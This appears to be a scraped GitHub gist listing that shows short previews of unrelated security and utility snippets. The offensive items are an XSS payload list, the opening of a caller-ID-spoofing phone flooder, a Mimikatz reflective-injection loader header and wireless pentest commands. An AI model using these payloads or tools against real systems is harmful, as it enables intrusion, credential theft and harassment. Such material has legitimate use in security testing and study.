社会人のための趣味CTFまとめ http://hority-ctf.blogspot.jp/2014/08/ctf.html
Boschko OlivierLaflamme
rdegges
/ advanced-flood.py
Created
November 21, 2009 00:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| advanced-flood.py | |
| @author: Randall Degges | |
| @email: [email protected] | |
| @date: 11-20-09 | |
| This program floods the specified phone number and spoofs caller ID making it |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 0 is too far from ` ;) | |
| set -g base-index 1 | |
| # Automatically set window title | |
| set-window-option -g automatic-rename on | |
| set-option -g set-titles on | |
| #set -g default-terminal screen-256color | |
| set -g status-keys vi | |
| set -g history-limit 10000 |
bradmontgomery
/ dummy-web-server.py
Last active
November 13, 2024 16:11
a minimal http server in python. Responds to GET, HEAD, POST requests, but will fail on anything else.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Very simple HTTP server in python (Updated for Python 3.7) | |
| Usage: | |
| ./dummy-web-server.py -h | |
| ./dummy-web-server.py -l localhost -p 8000 | |
| Send a GET request: |
Meatballs1
/ PELoader.cs
Last active
October 3, 2022 17:48
Reflective PE Injection Mimikatz - Via InstallUtil.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* |
dogrocker
/ Wireless Penetration Testing Cheat Sheet.md
Created
July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
The device is shipped with test firmware installed. To burn a proper firmware, you will need:
- Atmel USB DFU Programmer from https://sourceforge.net/projects/dfu-programmer/
- Actual firmware files, which in worst case scenario you have to build yourself
- Incorrect instructions from https://store.ryscc.com/blogs/news/upgrading-the-firmware-on-a-chameleonmini
- Correct instructions (and a .bat file) in the firmware documentation
The instructions on the blog page are incorrect because Rev G hardware uses ATxmega128A4U instead of ATxmega32A4U. Why? Probably an outdated version of hardware.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
HarmJ0y
/ PowerView-3.0-tricks.ps1
Last active
November 17, 2024 06:10
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -x | |
| #Date: 21/7/2017 | |
| #Author: Mohan | |
| #Purpose: To upload files to AWS S3 via Curl | |
| #Uploads file at the top level folder by default | |
| #S3 parameters | |
| S3KEY="XXXXXXXXXXX" | |
| S3SECRET="XXXXXXXXXXXXXXXX" |
OlderNewer